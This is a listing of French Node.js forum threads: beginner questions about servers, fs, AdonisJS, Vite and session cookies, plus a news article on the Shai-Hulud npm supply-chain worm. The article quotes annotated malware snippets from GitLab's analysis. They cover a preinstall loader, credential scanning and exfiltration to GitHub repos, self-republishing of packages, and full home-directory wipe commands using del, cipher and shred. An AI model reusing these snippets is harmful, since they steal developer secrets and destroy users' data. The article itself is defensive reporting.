Forum du club des d�veloppeurs et IT Pro - NodeJS

Identification d'exercices sur les tutos d�veloppez

frunch — Fri, 09 Jan 2026 12:51:42 GMT

Bonjour,
Je navigue entre les cours, c'est la gal�re pour comprendre.
J'en �tais au cours 6 du codeur youtubeur, et faute d'explication sur les modules et les constantes ajout�s depuis le site uuid, j'ai pr�f�r� revenir � qqchose de plus simple.

J'ai essay� 2 liens de cours de d�veloppez :
- le premier, aucun exercice jusqu'� la page 17, j'ai arr�t�.
https://nodejs.developpez.com/tutori...-nodejs/#Lno-I
- Le 2�me, dit pour d�butant. J'ai fait le 1er exercice helloword,et je suis � la page 13 ou �� parle de fonction, mais on nous dit pas dans quel fichier la mettre.

Citation:

Tout d'abord, compl�tons la fonction start() de notre serveur afin de pouvoir lui passer en param�tre la fonction route
que nous utiliserons :

https://nodejs.developpez.com/tutori...ivre-debutant/
Merci de votre aide

gestion des fichiers

frunch — Tue, 06 Jan 2026 03:14:48 GMT

Bonjour � tous,
Merci pour m'avoir orient� vers node.js avec le message pr�c�dent.
Je suis au cours n�5 sur la cr�ation d'un dossier, et le message n'apparait pas sur node comme pour l'instructeur avec :

Code:

if(fs.existsSync('/mesFichiers')){

Ils en discutent en commentaires de la video sur l'utilisation incorrecte, en proposant fs.exists, fs.access ou fs.stat,
mais rien n'y fait. C'est � 4:43

Merci

Images attach�es

Cr�ation d'un serveur

frunch — Mon, 05 Jan 2026 09:29:01 GMT

Bonjour,
Je fais les exercices en s�rie de vid�os d'une chaine, et �� ne fonctionne plus � la cr�ation du serveur par la page localhost.

C'est � 6:35
Le message serveur cr�� est sens� apparaitre avec le chargement de la page, mais rien sur chrome ou firefox.
Je n'ai pas trouv� de tuto sur developpez sur ce sujet.
Pourriez-vous m'aider ?
Merci

Images attach�es

Le retour de Shai-Hulud r�v�le la fragilit� de l��cosyst�me JavaScript :

St�phane le calme — Tue, 25 Nov 2025 14:14:14 GMT

Le retour de Shai-Hulud r�v�le la fragilit� de l��cosyst�me JavaScript :
vol de secrets, runners GitHub d�tourn�s et saboteurs int�gr�s dans plus de 300 paquets npm infect�s qui se sont propag�es sur 27 000 d�p�ts GitHub

La communaut� JavaScript pensait avoir tir� les le�ons de la premi�re vague Shai-Hulud. Pourtant, fin novembre 2025, une nouvelle offensive frappe l��cosyst�me npm avec une sophistication in�dite. Plus de 300 paquets infect�s, des milliers de d�p�ts compromis, des jetons de cloud d�rob�s, des runners GitHub manipul�s et, en bout de cha�ne, une v�ritable d�monstration de ce qu�une attaque supply-chain moderne peut provoquer.

Contexte : pourquoi ce type d�attaque est pertinent

L��cosyst�me npm est immense : des millions de paquets, de nombreuses d�pendances transversales, et une grande part de confiance implicite envers les mainteneurs et les versions. Cette confiance est devenue une cible privil�gi�e pour les acteurs malveillants : en compromettant un paquet diffus� largement, ils peuvent infecter de nombreuses applications en aval, directement ou indirectement.

L�incident original nomm� Shai‑Hulud (sans le � 1 �) avait d�j� �t� document� pr�c�demment : une fonction d'auto-r�plication et de propagation dans l��cosyst�me npm, avec vol de jetons, des insertions de workflows GitHub malveillants, etc. La nouvelle vague, Sha1-Hulud, reprend et amplifie ces techniques.

Le fait que la derni�re campagne soit cibl�e � par la cha�ne d�approvisionnement logicielle � (software supply chain) la rend d�autant plus critique : ici, ce ne sont pas seulement des utilisateurs finaux ou des organisations sp�cifiques qui sont vis�s, mais potentiellement tous les projets reposant sur un des paquets compromis.

Une attaque qui rappelle la fragilit� de l��cosyst�me JavaScript

L��cosyst�me npm est devenu un symbole de vitesse et d�efficacit�, mais aussi de vuln�rabilit�. La multiplication des d�pendances, les scripts d�installation automatiques, l�absence de v�rification syst�matique du code publi� : autant de portes ouvertes pour des campagnes malveillantes de plus en plus industrielles. Shai-Hulud, d�j� connu pour une premi�re vague particuli�rement agressive, d�montre une nouvelle fois � quelle vitesse une attaque supply-chain peut contaminer un environnement qui repose sur la confiance plus que sur le contr�le.

Dans cette seconde offensive, plus de 300 paquets ont �t� modifi�s pour inclure du code malveillant. La contamination s�est ensuite propag�e aux projets qui les utilisent, pour atteindre des dizaines de milliers de d�p�ts GitHub en quelques heures.

Selon HelixGuard, la campagne a vu ses paquets malveillants �tre publi�s entre le 21 et le 23 novembre 2025.

Citation:

Envoy� par HelixGuard

Le 24 novembre 2025, HelixGuard a d�tect� que plus de 1 000 composants du registre NPM avaient �t� corrompus � l'aide de la m�me m�thode en l'espace de quelques heures. Les nouvelles versions de ces paquets publi�es dans le registre NPM pr�tendaient faussement introduire le runtime Bun, ajoutant le script preinstall: node setup_bun.js ainsi qu'un fichier bun_environment.js obscurci.

Une fois ex�cut�, le logiciel malveillant t�l�charge et ex�cute TruffleHog pour analyser la machine locale, volant des informations sensibles telles que les jetons NPM, les identifiants AWS/GCP/Azure et les variables d'environnement.

Le code malveillant exfiltre les informations vol�es en cr�ant un runner GitHub Action nomm� SHA1HULUD et une description de r�f�rentiel GitHub Sha1-Hulud : The Second Coming. Cela sugg�re qu'il pourrait s'agir du m�me attaquant que celui derri�re l'attaque � Shai-Hulud � observ�e en septembre 2025.

� l'heure actuelle, plus de 27 000 r�f�rentiels GitHub ont �t� infect�s.

De son c�t�, l'�quipe de recherche sur les vuln�rabilit�s de GitLab a elle aussi identifi� une attaque active � grande �chelle visant la cha�ne d'approvisionnement, impliquant une variante destructrice de logiciel malveillant se propageant dans l'�cosyst�me npm :

� Notre syst�me de surveillance interne a d�tect� plusieurs paquets infect�s contenant ce qui semble �tre une version �volu�e du logiciel malveillant "Shai-Hulud". Les premi�res analyses montrent un comportement de propagation de type ver qui infecte automatiquement d'autres paquets g�r�s par les d�veloppeurs concern�s. Plus grave encore, nous avons d�couvert que le logiciel malveillant contient un m�canisme de "commutateur d'homme mort" qui menace de d�truire les donn�es des utilisateurs si ses canaux de propagation et d'exfiltration sont coup�s �.

Comment la contamination s�op�re : anatomie d�un ver npm moderne

L�attaque repose sur une m�canique huil�e, qui combine vol de secrets, propagation automatique et exploitation des plateformes de d�veloppement.

Un script d�installation comme porte d�entr�e

Le c�ur de l�attaque r�side dans les scripts � postinstall � ins�r�s dans les paquets infect�s. Lorsqu�un d�veloppeur installe la d�pendance, un fichier JavaScript obfusqu� s�ex�cute automatiquement.
Ce script scanne l�environnement local � la recherche de secrets :

jetons npm,
cl�s GitHub (PATs),
identifiants AWS/GCP/Azure,
variables d�environnement sensibles,
fichiers de configuration cloud.

Ces secrets permettent ensuite au malware de rebondir sur d�autres surfaces : cr�ation de d�p�ts GitHub, interactions avec les workflows, d�ploiement d�agents malveillants, etc.

Auto-r�plication par infection des comptes npm compromis

Si le script trouve un jeton npm valide, il modifie automatiquement les paquets g�r�s par ce compte. Il ins�re le code malveillant dans la nouvelle version, puis publie le paquet mis � jour comme s�il s�agissait d�une release l�gitime. Ce m�canisme transforme l�attaque en ver : chaque compte compromis amplifie la propagation en infectant ses propres biblioth�ques.

Manipulation des workflows GitHub pour persister

Nouvel �l�ment inqui�tant : le malware cr�e ou modifie des workflows GitHub Actions pour maintenir un acc�s permanent. Il installe un runner auto-h�berg� portant un nom sp�cifique, ajoute des workflows capables d�ex�cuter des commandes � distance et cr�e parfois des d�p�ts publics pour exfiltrer les donn�es d�rob�es.

Capacit� destructive en cas d��chec

Lorsque le ver n�arrive pas � voler des secrets exploitables, il d�clenche parfois un volet destructeur. Dans certains sc�narios observ�s, il supprime le r�pertoire personnel de la machine ou efface des configurations essentielles, transformant une attaque de vol en attaque de sabotage.

GitLab r�sume l'attaque de cette mani�re :

Citation:

Envoy� par GitLab

Notre syst�me de surveillance interne, qui analyse les registres de paquets open source � la recherche de paquets malveillants, a identifi� plusieurs paquets npm infect�s par un logiciel malveillant sophistiqu� qui :

R�cup�re les identifiants de GitHub, npm, AWS, GCP et Azure.
Exfiltre les donn�es vol�es vers des r�f�rentiels GitHub contr�l�s par les attaquants.
Se propagent en infectant automatiquement d'autres paquets appartenant aux victimes
Contiennent une charge utile destructrice qui se d�clenche si le logiciel malveillant perd l'acc�s � son infrastructure

Bien que nous avons confirm� plusieurs paquets infect�s, le m�canisme de propagation de type ver signifie que de nombreux autres paquets sont susceptibles d'�tre compromis. L'enqu�te se poursuit tandis que nous nous effor�ons de comprendre toute l'�tendue de cette campagne.

Pourquoi cette campagne est plus dangereuse que la premi�re

Si la premi�re offensive Shai-Hulud avait d�j� marqu� les esprits, cette nouvelle vague va plus loin sur plusieurs aspects :

Une propagation plus rapide et plus profonde

L�utilisation combin�e de npm, GitHub et des runners CI donne � l�attaque une port�e � transversale � : elle touche non seulement le d�veloppement local, mais aussi les pipelines de build et les environnements d�int�gration.

Une palette d�objectifs �largie

Le premier Shai-Hulud se concentrait surtout sur le vol de jetons.
Celui-ci ajoute :

la destruction de donn�es ;
la prise de contr�le persistante via CI/CD ;
la r�plication autonome ;
la contamination silencieuse d��cosyst�mes entiers.

Une meilleure dissimulation

Les scripts malveillants sont plus compacts, mieux obfusqu�s et s�ex�cutent � travers des chemins d�installation courants. Beaucoup passent inaper�us dans les outils de d�tection statique classiques.

Vecteur d'infection initial

Le logiciel malveillant s'infiltre dans les syst�mes gr�ce � un processus de chargement en plusieurs �tapes soigneusement �labor�. Les paquets infect�s contiennent un fichier package.json modifi� avec un script de pr�installation pointant vers setup_bun.js. Ce script de chargement semble inoffensif, pr�tendant installer le runtime JavaScript Bun, qui est un outil l�gitime. Cependant, son v�ritable objectif est d'�tablir l'environnement d'ex�cution du logiciel malveillant.

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
// Ce fichier est ajouté aux paquets de la victime sous le nom setup_bun.js.
#!/usr/bin/env node
async function downloadAndSetupBun() {
  // Téléchargements et installations bun
  let command = process.platform === 'win32' 
    ? 'powershell -c "irm bun.sh/install.ps1|iex"'
    : 'curl -fsSL https://bun.sh/install | bash';
 
  execSync(command, { stdio: 'ignore' });
 
  // Exécute le logiciel malveillant proprement dit.
  runExecutable(bunPath, ['bun_environment.js']);
}

Le chargeur setup_bun.js t�l�charge ou localise le runtime Bun sur le syst�me, puis ex�cute la charge utile bun_environment.js int�gr�e, un fichier obscurci de 10 Mo d�j� pr�sent dans le package infect�. Cette approche offre plusieurs niveaux de contournement : le chargeur initial est petit et semble l�gitime, tandis que le code malveillant r�el est fortement obscurci et int�gr� dans un fichier trop volumineux pour �tre inspect� de mani�re informelle.

Collecte d'identifiants

Une fois ex�cut�, le logiciel malveillant commence imm�diatement � rechercher des identifiants dans plusieurs sources :

Jetons GitHub : recherche dans les variables d'environnement et les configurations CLI GitHub les jetons commen�ant par ghp_ (jeton d'acc�s personnel GitHub) ou gho_(jeton OAuth GitHub)
Identifiants cloud : �num�re les identifiants AWS, GCP et Azure � l'aide des SDK officiels, en v�rifiant les variables d'environnement, les fichiers de configuration et les services de m�tadonn�es
Jetons npm : extrait les jetons pour la publication de paquets � partir des fichiers .npmrc et des variables d'environnement, qui sont des emplacements courants pour stocker en toute s�curit� les configurations et les identifiants sensibles.
Analyse du syst�me de fichiers : t�l�charge et ex�cute Trufflehog, un outil de s�curit� l�gitime, pour analyser l'ensemble du r�pertoire d'accueil � la recherche de cl�s API, de mots de passe et d'autres secrets cach�s dans les fichiers de configuration, le code source ou l'historique git.

Code:

1
2
3
4
5
6
7
8
9
10
11
async function scanFilesystem() {
  let scanner = new Trufflehog();
  await scanner.initialize();
 
  // Analyse le répertoire personnel de l'utilisateur à la recherche de secrets
  let findings = await scanner.scanFilesystem(os.homedir());
 
  // Télécharge les résultats vers le référentiel d'exfiltration
  await github.saveContents("truffleSecrets.json", 
    JSON.stringify(findings));
}

R�seau d'exfiltration de donn�es

Le logiciel malveillant utilise des jetons GitHub vol�s pour cr�er des r�f�rentiels publics avec une mention sp�cifique dans leur description : � Sha1-Hulud : The Second Coming �. Ces r�f�rentiels servent de bo�tes de d�p�t pour les identifiants et les informations syst�me vol�s.

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
async function createRepo(name) {
  // Crée un référentiel avec un marqueur de description spécifique.
  let repo = await this.octokit.repos.createForAuthenticatedUser({
    name: name,
    description: "Sha1-Hulud: The Second Coming.", // Marqueur pour retrouver les dépôts ultérieurement
    private: false,
    auto_init: false,
    has_discussions: true
  });
 
  // Installe GitHub Actions Runner pour la persistance
  if (await this.checkWorkflowScope()) {
    let token = await this.octokit.request(
      "POST /repos/{owner}/{repo}/actions/runners/registration-token"
    );
    await installRunner(token); // Installe un runner auto-hébergé
  }
 
  return repo;
}

Si le jeton GitHub initial ne dispose pas des autorisations suffisantes, le logiciel malveillant recherche d'autres r�f�rentiels compromis portant le m�me marqueur, ce qui lui permet de r�cup�rer les jetons d'autres syst�mes infect�s. Cela cr�e un r�seau r�silient de type botnet dans lequel les syst�mes compromis partagent des jetons d'acc�s.

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// Comment le réseau de logiciels malveillants partage les jetons :
async fetchToken() {
  // Recherche sur GitHub les dépôts comportant le marqueur d'identification
  let results = await this.octokit.search.repos({
    q: '"Sha1-Hulud: The Second Coming."',
    sort: "updated"
  });
 
  // Essaye de récupérer les jetons des référentiels compromis
  for (let repo of results) {
    let contents = await fetch(
      `https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`
    );
 
    let data = JSON.parse(Buffer.from(contents, 'base64').toString());
    let token = data?.modules?.github?.token;
 
    if (token && await validateToken(token)) {
      return token;  // Utilise un jeton provenant d'un autre système infecté
    }
  }
  return null;  // Aucun jeton valide trouvé dans le réseau
}

Propagation dans la cha�ne logistique

� l'aide des jetons npm vol�s, le logiciel malveillant :

T�l�charge tous les paquets g�r�s par la victime.
Injecte le chargeur setup_bun.js dans les scripts de pr�installation de chaque paquet.
Int�gre la charge utile malveillante bun_environment.js.
Incr�mente le num�ro de version du paquet.
Republie les paquets infect�s sur npm.

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
async function updatePackage(packageInfo) {
  // Télécharge le paquet original
  let tarball = await fetch(packageInfo.tarballUrl);
 
  // Extrait et modifier package.json
  let packageJson = JSON.parse(await readFile("package.json"));
 
  // Ajoute un script de préinstallation malveillant
  packageJson.scripts.preinstall = "node setup_bun.js";
 
  // Incrémente la version
  let version = packageJson.version.split(".").map(Number);
  version[2] = (version[2] || 0) + 1;
  packageJson.version = version.join(".");
 
  // Installateur de porte dérobée groupé
  await writeFile("setup_bun.js", BACKDOOR_CODE);
 
  // Reconditionne et publie
  await Bun.$`npm publish ${modifiedPackage}`.env({
    NPM_CONFIG_TOKEN: this.token
  });
}

Le dispositif anti-sabotage

L'analyse de GitLab a r�v�l� la pr�sence d'une charge utile destructrice con�ue pour prot�ger l'infrastructure du logiciel malveillant contre les tentatives de suppression.

Le logiciel malveillant surveille en permanence son acc�s � GitHub (pour l'exfiltration) et � npm (pour la propagation). Si un syst�me infect� perd simultan�ment l'acc�s � ces deux canaux, il d�clenche imm�diatement la destruction des donn�es sur la machine compromise. Sous Windows, il tente de supprimer tous les fichiers utilisateur et d'�craser les secteurs du disque. Sur les syst�mes Unix, il utilise shred pour �craser les fichiers avant leur suppression, rendant leur r�cup�ration pratiquement impossible.

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
// CRITIQUE : l'échec de la validation du jeton déclenche sa destruction.
async function aL0() {
  let githubApi = new dq();
  let npmToken = process.env.NPM_TOKEN || await findNpmToken();
 
  // Essaye de trouver ou de créer un accès GitHub.
  if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {
    let fetchedToken = await githubApi.fetchToken(); // Recherche des jetons dans les référentiels compromis
 
    if (!fetchedToken) {  // Accès GitHub impossible
      if (npmToken) {
        // Revenir à la propagation NPM uniquement
        await El(npmToken);
      } else {
        // DÉCLENCHEUR DE DESTRUCTION : Pas d'accès à GitHub ET pas d'accès à NPM
        console.log("Error 12");
        if (platform === "windows") {
          // Tentatives de suppression de tous les fichiers utilisateur et de réécriture des secteurs du disque
          Bun.spawnSync(["cmd.exe", "/c", 
            "del /F /Q /S \"%USERPROFILE%*\" && " +
            "for /d %%i in (\"%USERPROFILE%*\") do rd /S /Q \"%%i\" & " +
            "cipher /W:%USERPROFILE%"  // Remplace les données supprimées
          ]);
        } else {
          // Tentatives de destruction de tous les fichiers modifiables dans le répertoire personnel
          Bun.spawnSync(["bash", "-c", 
            "find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | " +
            "xargs -0 -r shred -uvz -n 1 && " +  // Overwrite and delete
            "find \"$HOME\" -depth -type d -empty -delete"  // Supprime les répertoires vides
          ]);
        }
        process.exit(0);
      }
    }
  }
}

Sources : HelixGuard, GitLab

Et vous ?

:fleche: Faut-il repenser le mod�le de confiance autour des mainteneurs npm, notamment pour ceux g�rant des centaines de paquets ?

:fleche: Le concept de � ver npm � doit-il �tre int�gr� comme nouvelle cat�gorie de menace dans les outils de d�tection et d�analyse statique ?

:fleche: Les scanners de d�pendances actuels sont-ils r�ellement capables de d�tecter une attaque aussi obfusqu�e et dynamique que Shai-Hulud ?

:fleche: Faut-il imposer une signature obligatoire des paquets npm, ou cela cr�erait-il un risque de centralisation ?

:fleche: Dans quelle mesure les workflows GitHub Actions doivent-ils �tre consid�r�s comme une surface d�attaque active � part enti�re ?

Images attach�es

Compr�hension fonction Hash md5

Xelland — Sat, 08 Nov 2025 17:49:53 GMT

je ne suis pas dev JS (je connais d'autres langages, donc j'arrive � comprendre le JS dans les tr�s grandes lignes)
je cherche � comprendre comment fonctionne un code que j'ai sur un programme :

j'ai un code qui appelle la m�thode objectHash
comme elle est "assez grosse", voici le lien o� on peut la trouver
https://github.com/puleos/object-has...aster/index.js

en entr�e :

Code:

1
2
3
var object_in = {texte:"Mon texte.",ident:"action01"};
var options = {algorithm:"md5"};
var res = objectHash (object_in, options);

j'obtiens res = db584c40868c7265aef607e3788acf16

d'apr�s ce que je comprends, le code fait un hash md5 de quelque chose (en utilisant object_in)
mais l� en entr�e, on a une liste de propri�t�s et non un string

=> comment trouver quel est le texte qui est hach� ?

merci

Initialiser un projet avec AdonisJS

YogSothoth94 — Fri, 03 Oct 2025 12:13:18 GMT

Bonjour � tous,

je n'arrive pas � initialiser un projet avec AdonisJS

nodejs : 24.9.0
npm : 11.6.1
windows : 11

je lance npm avec :

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
 
C:\nodejs>npm init adonisjs@latest accueil -- --kit=web --db=sqlite --auth-guard=session
 
> npx
> create-adonisjs accueil --kit=web --db=sqlite --auth-guard=session
 
 
     _       _             _         _ ____
    / \   __| | ___  _ __ (_)___    | / ___|
   / _ \ / _` |/ _ \| '_ \| / __|_  | \___ \
  / ___ \ (_| | (_) | | | | \__ \ |_| |___) |
 /_/   \_\__,_|\___/|_| |_|_|___/\___/|____/
 
 
> Download starter kit (35 ms)
  Failed to download https://api.github.com/repos/adonisjs/web-starter-kit/tarball/main: TypeError: fetch failed
> Install packages
> Prepare application
> Configure Lucid
> Configure Auth

j'ai test� sans option, j'arrive � choisir les options puis �a donne le m�me r�sultat.
Pouvez vous me donner une piste de r�solution ?

Merci

�chec Connexion au serveur

Mr l'Ashanti — Sat, 09 Aug 2025 11:55:25 GMT

Bonjour � tous...
Je rencontre un probl�me au niveau du serveur cpanel. Le premier journal avant que rien ne s'affiche �tait l'absence du module dotenv. Or j'ai utilis� l'installation node.js sur cpanel pour installer les composantes manquantes ( run npm). Et malgr� �a l'erreur persistait. J'ai donc test� avec le terminal du serveur, la connexion � la base de donn�es ne se plantait pas. Mais la connexion avec la page login donne toujours le m�me message d'erreur li� au serveur( erreur de connexion au serveur.
Failed to load ressource: the server responded with a status of 404). J'ai red�marr� l'application plusieurs fois mais rien. Le plus gros probl�me est que le journal n'affiche plus rien pour qu'on sache le probl�me vu j'ai apport� d'autres modifications.

R�sum� :
L'application fonctionne parfaitement lorsque je la lance manuellement via le terminal
* Les logs de cPanel restent vides, ce qui indique que l'application ne d�marre pas du tout via l' interface

Est-ce qu'on peut minify ou unminify a fichier

pierrot10 — Tue, 22 Jul 2025 21:14:18 GMT

Bonjour,

J'ai un fichier avec un large contenu qui se trouve que sur une ligne.
Je pense qu'il est minifi�

Est-ce qu'avec nodejs, il y aurait une commande pour en faire un autre fichier mais sous un format lisible par un humain?

J'aimerais aussi faire une structure comme celle-la qui contient la librairie leaflet

Citation:

css/leaftlet/leaflet.css
js/leaflet/leaflet.min.js
map.html

Map.html affichera donc une carte et j'aimerais faire l'inervse. Est-ce qu'avec nidejs, je peux s�lectionner map.html, les dossiers css et js et tous leurs contenu, et avoir tout dans map.min.html (ou mapmin.html)?

J'ai cru comprendre que Sublime 3, utilise nodejs pour le faire, donc je me demandais s'il y avait une commane pour faire un minify et un unminify

Merci

Lancement de VIte

labarre2002 — Mon, 09 Jun 2025 12:16:01 GMT

Bonjour

J'installe vite en lancant la commande

Code:

npm run dev

et esp�re avoir

"Vite vxxx ready in 90ms

Local http://localhost:5173"

mais je n'ai rien

Pourrais-je avoir des explications SVP ?

Merci.

Images attach�es

D�connexion globale

sylvain257 — Wed, 28 May 2025 10:33:12 GMT

Bonjour,

Je construis des applications qui demandent un syst�me d'authentification. Cette authentification s'effectue bien sur c�t� serveur via une API d�di�e, avec des endpoints login, me, et logout.

Le probl�me que je rencontre est le suivant : la connexion � mon application 1 se passe normalement avec le passage d'un cookie httponly, la connexion � mon application 2 se passe normalement, m�me process. La d�connexion de l'application 2 entraine la d�connexion de l'application 1 et inversement. Je pense que le cookie n'est pas assez discriminant, il poss�de un nom trop g�n�rique, du coup si j'utilise le m�me navigateur, il se passe ce que je d�cris plus haut.

Merci pour votre aide,

Sylvain

Je partage mon code :

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
    static async login(req, res) {
        const userAgent = req.headers['user-agent'] || '';
        const ipAddress = req.ip || req.connection.remoteAddress || 'inconnue';
        const { identifiant, password } = req.body;
 
        const loginSchema = Joi.object({
            identifiant: Joi.string().trim().required(),
            password: Joi.string().required()
        });
 
        // Validation Joi
        const { error } = loginSchema.validate({ identifiant, password });
        if (error) {
            return res.status(400).json({ message: "Identifiant ou mot de passe manquant" });
        }
 
        try {
            // 1. Récupération de l'utilisateur
            const query = `
            SELECT 
                c.id_contributeur,
                c.nom_contributeur,
                c.identifiant,
                c.email,
                c.password,
                c.id_role
            FROM api_projet.contributeur c
            WHERE c.identifiant = $1
            `;
 
            const result = await pool.query(query, [identifiant]);
            if (result.rowCount === 0) {
            return res.status(401).json({ message: "Identifiant ou mot de passe incorrect" });
            }
 
            const utilisateur = result.rows[0];
 
            // 2. Vérification du mot de passe
            const passwordValid = await bcrypt.compare(password, utilisateur.password);
            if (!passwordValid) {
            return res.status(401).json({ message: "Identifiant ou mot de passe incorrect" });
            }
 
            // 3. Vérification de session existante pour ce user-agent
            const sessionCheck = await pool.query(
            `SELECT id_session FROM api_projet.sessions
            WHERE id_contributeur = $1 AND user_agent = $2`,
            [utilisateur.id_contributeur, userAgent]
            );
 
            if (sessionCheck.rowCount > 0) {
            return res.status(200).json({ message: "Déjà connecté sur ce navigateur." });
            }
 
            // 4. Création de la session
            const sessionId = crypto.randomUUID();
 
            await pool.query(
            `INSERT INTO api_projet.sessions (id_session, id_contributeur, ip_address, user_agent, expires_at)
            VALUES ($1, $2, $3, $4, NOW() + interval '7 days')`,
            [sessionId, utilisateur.id_contributeur, ipAddress, userAgent]
            );
 
            // 5. Cookie spécifique (évite collisions si plusieurs comptes connectés)
           const cookieName = `session_id_${utilisateur.id_contributeur}`;
 
            res.cookie(cookieName, sessionId, {
            httpOnly: true,
            secure: true,
            sameSite: "none",
            maxAge: 3 * 60 * 60 * 1000, // 3 heures
            path: "/"
            });
 
            return res.status(200).json({ message: "Connexion réussie" });
 
        } catch (err) {
            console.error("Erreur login :", err);
            return res.status(500).json({ message: "Erreur serveur lors de la connexion" });
        }
    };